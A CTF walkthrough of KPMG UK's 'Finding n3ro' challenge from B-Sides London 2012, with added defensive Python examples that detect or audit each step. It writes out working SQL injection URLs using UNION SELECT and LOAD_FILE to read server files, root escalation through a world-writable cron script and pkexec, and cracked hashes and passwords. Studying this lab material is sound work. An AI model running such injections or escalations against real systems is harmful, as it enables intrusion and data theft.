"finding n3ro" walk through
DESCRIPTION
KPMG UK's challenge "Finding n3ro" walkthroughTRANSCRIPT
Walkthrough of “Finding n3ro”
Copyright 0x776b7364 (c) 2012
Introduction
• “Finding n3ro” is a challenge created by KPMG UK for Security B-Sides London 2012
Part 1: Website
Link on the site: "mail to finding.n3ro" (mailto:[email protected], subject "Challenge 7: Finding N3ro... ")
Part 1: Email which I sent to [email protected]
I like to hang out on Google Groups…
Part 1: Google Groups search
Part 1: Result found!
Part 1: Random ASCII characters..?
http://groups.google.com/group/n3ro-tech-talk/msg/e8c3ed172eb21d2b
Part 1: Possibly Base64 encoded?
Part 1: Cleaning up the encoded string
Part 1: Converting from Base64 ASCII to binary
Part 1: Dumping the binary in hex form..
Part 1: Looks to be a MS Word document..
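The clean-up, decode, hex-dump and identify steps of Part 1, as an added Python example (not the author's tooling). The Base64 sample is constructed, not the challenge message; the magic-number table is the check that tells a legacy .doc (OLE2) from a .docx (ZIP) or an executable before anyone opens it.

```python
import base64
import re

# Constructed sample (not the challenge's real message): Base64 text as pasted
# from a web page, with line breaks, encoding the start of an OLE2 container.
SAMPLE = "0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAA\nAAAAAD4AAwD+/wkABgAAAAAAAAAAAAAA\n"

# Magic numbers worth checking once an unknown blob has been decoded.
MAGICS = [
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE2 compound document (legacy .doc/.xls/.ppt)"),
    (b"PK\x03\x04", "ZIP container (.docx, .apk, .jar, ...)"),
    (b"%PDF", "PDF"),
    (b"\x7fELF", "ELF executable"),
    (b"MZ", "PE executable"),
]

def clean_base64(text: str) -> str:
    """Drop anything outside the Base64 alphabet and restore '=' padding."""
    cleaned = re.sub(r"[^A-Za-z0-9+/]", "", text)
    return cleaned + "=" * (-len(cleaned) % 4)

def decode_blob(text: str) -> bytes:
    return base64.b64decode(clean_base64(text), validate=True)

def hexdump(data: bytes, width: int = 16) -> str:
    """xxd-style dump: offset, hex bytes, printable ASCII."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        ascii_part = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}  {hexpart:<{width * 3}} {ascii_part}")
    return "\n".join(lines)

def identify(data: bytes) -> str:
    """Name the container by its leading bytes; 'unknown' if nothing matches."""
    for magic, name in MAGICS:
        if data.startswith(magic):
            return name
    return "unknown"

if __name__ == "__main__":
    blob = decode_blob(SAMPLE)
    print(hexdump(blob))
    print("type:", identify(blob))
```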
Part 1: Contents of said document
Part 1: Properties of said document
Part 2 of Finding N3ro can be downloaded here: http://finding-n3ro.net/01efaa15a2b90d65fefa472cd00f6a4f/N3rosVM.zip;
Part 1: Contents of zip file
Part 1 (Solved): Contents of text file inside zip file.. And a pointer to Part 2
Part 2
Part 2: Contents of yet another text file
Port Knocking: An Introduction
• A method of externally opening ports by generating a connection attempt on a set of prespecified closed ports
• Once a correct sequence is received, firewall rules are dynamically modified to allow the host which sent the sequence to connect over specific port(s)
• Primary purpose is to prevent an attacker from scanning a system for potentially exploitable services by doing a port scan
Source: http://en.wikipedia.org/wiki/Port_knocking
Part 2: Port knocking continued..
• TCP ports Finger, NTP, HTTPS, DNS, RDP, FTP, Oracle Listener, Kerberos, SSH, HTTP (and in that order too...)
Finger 79
NTP 123
HTTPS 443
DNS 53
RDP 3389
FTP 21
Oracle Listener 1521
Kerberos 88
SSH 22
HTTP 80
Part 2: Before knocking…
Part 2: knock.exe 192.168.56.101 79 123 443 53 3389 21 1521 88 22 80 -v
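The sequence-matching a knock daemon performs for the Part 2 sequence, replayed over firewall log lines, as an added Python example (not the challenge VM's knock daemon). The iptables-style log format and the two client addresses are assumptions; the same replay is how a defender checks, from logs, which hosts completed the knock.

```python
import re
from collections import defaultdict

# Knock sequence from Part 2: Finger, NTP, HTTPS, DNS, RDP, FTP,
# Oracle Listener, Kerberos, SSH, HTTP, in that order.
KNOCK_SEQUENCE = [79, 123, 443, 53, 3389, 21, 1521, 88, 22, 80]

# Constructed firewall log (iptables-style fields; the format is assumed):
# host .2 knocks out of order, host .1 completes the sequence.
EVENTS = [("192.168.56.2", 79), ("192.168.56.2", 123), ("192.168.56.2", 53)]
EVENTS += [("192.168.56.1", p) for p in KNOCK_SEQUENCE] + [("192.168.56.2", 79)]
SAMPLE_LOG = "\n".join(
    f"kernel: KNOCK IN=eth0 SRC={src} DST=192.168.56.101 PROTO=TCP SPT={40000 + i} DPT={dpt}"
    for i, (src, dpt) in enumerate(EVENTS))

LOG_RE = re.compile(r"SRC=(?P<src>[\d.]+) .*?DPT=(?P<dpt>\d+)")

class KnockTracker:
    """Per-source state machine, as a knock daemon keeps it: advance only on the
    next expected port; any other port resets (a hit on the first port restarts)."""

    def __init__(self, sequence):
        self.sequence = list(sequence)
        self.progress = defaultdict(int)  # src -> correct knocks so far
        self.opened = []                  # sources that completed the sequence

    def feed(self, src: str, dpt: int) -> bool:
        if dpt == self.sequence[self.progress[src]]:
            self.progress[src] += 1
        else:
            self.progress[src] = 1 if dpt == self.sequence[0] else 0
        if self.progress[src] == len(self.sequence):
            self.opened.append(src)
            self.progress[src] = 0
            return True
        return False

def find_knockers(log: str, sequence=KNOCK_SEQUENCE) -> list:
    """Replay log lines through the tracker; return sources that completed the knock."""
    tracker = KnockTracker(sequence)
    for line in log.splitlines():
        m = LOG_RE.search(line)
        if m:
            tracker.feed(m.group("src"), int(m.group("dpt")))
    return tracker.opened

if __name__ == "__main__":
    print("completed knock sequence:", find_knockers(SAMPLE_LOG))
```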
Part 2 (Solved): An accessible webpage!
Part 3: SQL Injection
http://192.168.56.101/reshow.php?id=-1+or+1%3D1
All you need is /usr/share/mysql/n3ro.part4
Part 3: Testing UNION SELECT injection..
Part 3: Preparing the injection..
/usr/share/mysql/n3ro.part4 == 0x2f7573722f73686172652f6d7973716c2f6e33726f2e7061727434
Part 3 (Solved): SQL Injection II
http://192.168.56.101/reshow.php?id=-1%20UNION%20SELECT%201,LOAD_FILE(0x2f7573722f73686172652f6d7973716c2f6e33726f2e7061727434),3
User: n3ro
Password: KPMG_is_Hiring!
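What the two Part 3 requests look like from the server side, as an added Python example (not part of the walkthrough): detection logic run over a constructed Apache-style access log, matching on the URL-decoded parameter and decoding the 0x... literal so the log reviewer sees which file LOAD_FILE was pointed at. The log format and timestamps are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access log (format assumed). The two injected
# requests are the ones shown in Part 3 of the walkthrough.
SAMPLE_LOG = """\
192.168.56.1 - - [12/Jun/2012:10:00:01 +0100] "GET /reshow.php?id=7 HTTP/1.1" 200 512
192.168.56.1 - - [12/Jun/2012:10:00:05 +0100] "GET /reshow.php?id=-1+or+1%3D1 HTTP/1.1" 200 4096
192.168.56.1 - - [12/Jun/2012:10:00:09 +0100] "GET /reshow.php?id=-1%20UNION%20SELECT%201,LOAD_FILE(0x2f7573722f73686172652f6d7973716c2f6e33726f2e7061727434),3 HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/')
HEX_LITERAL_RE = re.compile(r"0x([0-9a-fA-F]{2,})")
# Evaluated on the URL-decoded value, so %20 / + encoding does not hide them.
SIGNATURES = [
    ("tautology", re.compile(r"\b(?:or|and)\s+\d+\s*=\s*\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("file-read", re.compile(r"\bload_file\s*\(", re.I)),
]

def decode_hex_literals(value: str) -> list:
    """MySQL reads 0x2f75... as a string; decode it to see which path was requested."""
    decoded = []
    for h in HEX_LITERAL_RE.findall(value):
        if len(h) % 2 == 0:
            decoded.append(bytes.fromhex(h).decode("utf-8", "replace"))
    return decoded

def scan_request(path: str) -> list:
    """Findings for one request: (param, signature, decoded hex literals) per hit."""
    findings = []
    query = urlsplit(path).query
    # parse_qs already URL-decodes and turns '+' into spaces
    for param, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            for name, pattern in SIGNATURES:
                if pattern.search(value):
                    findings.append((param, name, decode_hex_literals(value)))
    return findings

def scan_log(log: str) -> list:
    """(client, param, signature, decoded literals) for every suspicious request."""
    results = []
    for line in log.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            client = line.split()[0]
            results += [(client,) + f for f in scan_request(m.group("path"))]
    return results
```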
Part 4
• Tried a lot of methods to get root, including
  • Sudo
    • n3ro not in /etc/sudoers
  • Java atomic reference
    • Returned shell with n3ro privs
  • PHP load_file/file_get_contents
    • Permissions error
  • Some other Linux kernel privilege escalation exploit
    • Kernel has been updated
Part 4 Method 1: Peeking at crontab
Part 4 Method 1: Looking at /etc/1min.sh
In summary, 1min.sh is executed every minute by crontab, is owned by root, executed in the context of root, and is world-writable
Part 4 Method 1: Exploiting…
Part 4 Method 1 (Solved): Wait a minute…
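The misconfiguration Method 1 relies on (a root cron job whose script anyone can edit) is cheap to audit. Added Python example, not from the walkthrough: it parses system-crontab lines, stats the script each one runs, and flags world- or group-writable files, non-root ownership of root jobs, relative paths and missing scripts. The demo recreates the 1min.sh situation in a temp directory; stat_fn is injectable so the checks can be exercised without real root-owned files.

```python
import os
import re
import stat
import tempfile

# System crontab entry: minute hour dom month dow user command
# (or "@reboot user command"); e.g. "* * * * * root /etc/1min.sh".
CRON_RE = re.compile(r"^\s*(?:@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")

def audit_entry(line: str, stat_fn=os.stat) -> list:
    """Problems with one crontab entry; stat_fn is injectable for testing."""
    m = None if line.lstrip().startswith("#") else CRON_RE.match(line)
    if not m:
        return []
    user, cmd = m.group("user"), m.group("cmd")
    script = cmd.split()[0]
    if not script.startswith("/"):
        return [f"{script}: relative path, resolved through cron's PATH"]
    try:
        st = stat_fn(script)
    except FileNotFoundError:
        return [f"{script}: missing, a creatable path that would run as {user}"]
    problems = []
    if st.st_mode & stat.S_IWOTH:
        problems.append(f"{script}: world-writable but runs as {user}")
    if st.st_mode & stat.S_IWGRP:
        problems.append(f"{script}: group-writable but runs as {user}")
    if user == "root" and st.st_uid != 0:
        problems.append(f"{script}: runs as root but is owned by uid {st.st_uid}")
    return problems

def audit_crontab(text: str, stat_fn=os.stat) -> dict:
    """Map each offending crontab line to its problems."""
    report = {}
    for line in text.splitlines():
        problems = audit_entry(line, stat_fn)
        if problems:
            report[line] = problems
    return report

def demo() -> list:
    """Reproduce the 1min.sh mistake in a temp dir: root's cron script, mode 777."""
    path = os.path.join(tempfile.mkdtemp(), "1min.sh")
    with open(path, "w") as f:
        f.write("#!/bin/sh\necho tick\n")
    os.chmod(path, 0o777)  # the defect: anyone can replace what root will execute
    return audit_entry(f"* * * * * root {path}")
```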
Part 4 Method 2: man pkexec
Part 4 Method 2: Using pkexec..
Part 4 Method 2 (Solved): Using pkexec..
Part 5: Android Virtual Device
• ubuntu$ cd /Desktop/android-sdk-linux/tools
• ubuntu$ ./android avd
Part 5: Connecting to AVD via terminal
• ubuntu$ ./adb devices
• ubuntu$ ./adb -s emulator-5554 shell
Part 5 Method 1: Pulling the apk, and then converting apk to jar
• Location of apk: /data/app/com.bsides.hackme-1.apk
• ubuntu$ ./adb pull /data/app/com.bsides.hackme-1.apk
Part 5 Method 1 (Solved): Decompiled jar file
localAlertDialog.setMessage("You can open /home/n3ro/21332esw.zip with password: KPMG-Cyber-Security");
Part 5 Method 2: Connecting to the database
• droid# pwd
• droid# cd /data/data/com.bsides.hackme/databases
• droid# ls
• PasswordReaderdb
• droid# sqlite3 PasswordReaderdb
• sqlite3> .tables
• android_metadata userCred
• sqlite3> .dump userCred
Part 5 Method 2: Getting the hash
Part 5 Method 2: Googling the hash
md5("password14") = 8ee736784ce419bd16554ed5677ff35b
Part 5 Method 2 (Solved): Connecting to the database
Part 6: Getting the instructions
Part 6: What is Volatility?
Part 6: Using Volatility to retrieve password hashes in memory dump file
n3ro:1011:90e0328fd51e9347f68b27ea95cd8bb2:7fa21bbd95d9f220b3f651cf8405a91b
Part 6 (Solved): Rainbow tables were used to crack the hash
Password: KPMGisH1r1ng
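Why the Part 6 hash fell to a rainbow table so easily is visible in the hashdump line itself: the LM field is populated rather than the blank-LM constant, so the host was still storing LM hashes. Added Python example (not from the walkthrough) that parses pwdump-format output and triages each account; the n3ro line is the one on the page, the Administrator and Guest lines are constructed.

```python
import re
from collections import Counter

# Well-known hash values: "no LM hash stored" and "empty password".
BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"
BLANK_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# pwdump format as printed by Volatility's hashdump: user:rid:lmhash:nthash:::
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32})(?::::)?$", re.I)

# Sample dump: the n3ro line is the one shown in Part 6; the other two
# accounts are constructed for illustration.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7fa21bbd95d9f220b3f651cf8405a91b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
n3ro:1011:90e0328fd51e9347f68b27ea95cd8bb2:7fa21bbd95d9f220b3f651cf8405a91b
"""

def parse_hashdump(text: str) -> list:
    """Parse pwdump lines into dicts; lines that do not fit the format are skipped."""
    accounts = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if m:
            accounts.append({"user": m["user"], "rid": int(m["rid"]),
                             "lm": m["lm"].lower(), "nt": m["nt"].lower()})
    return accounts

def triage(accounts: list) -> dict:
    """What a defender should act on, per account."""
    nt_counts = Counter(a["nt"] for a in accounts if a["nt"] != BLANK_NT)
    findings = {}
    for a in accounts:
        issues = []
        if a["lm"] != BLANK_LM:
            # LM: uppercased, split into two 7-char DES halves; rainbow tables break it fast
            issues.append("LM hash stored; disable LM hash storage")
            if a["lm"][16:] == BLANK_LM[16:]:
                issues.append("LM second half blank: password is 7 characters or fewer")
        if a["nt"] == BLANK_NT:
            issues.append("empty password")
        if nt_counts[a["nt"]] > 1:
            issues.append("NT hash shared with another account (password reuse)")
        if issues:
            findings[a["user"]] = issues
    return findings
```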
Part 7: Using the password to decrypt the zip file..
Part 7: Our favourite packet analysis software
Part 7: Retrieving objects from packet data
Part 7: Contents of file "p1"
Part 7: Contents of file "part7.c"
Part 7: Directory listing of files
Being too lazy to install a C compiler…
Part 7 (Solved): Contents of output joined file
Part 8: Files involved
Part 8: unlock.mp3
Part 8: Deciphering morse code
Part 8: Last password?
THEFINAL PASSWORD TOUNLOCK N3RO IS LKNH8732DWQ12SSW14FT
Part 8: Extracting our prize…
Part 8 (Solved): Picture of n3ro (presumably)
Miscellaneous: Maintaining access
Miscellaneous: Some interesting stuff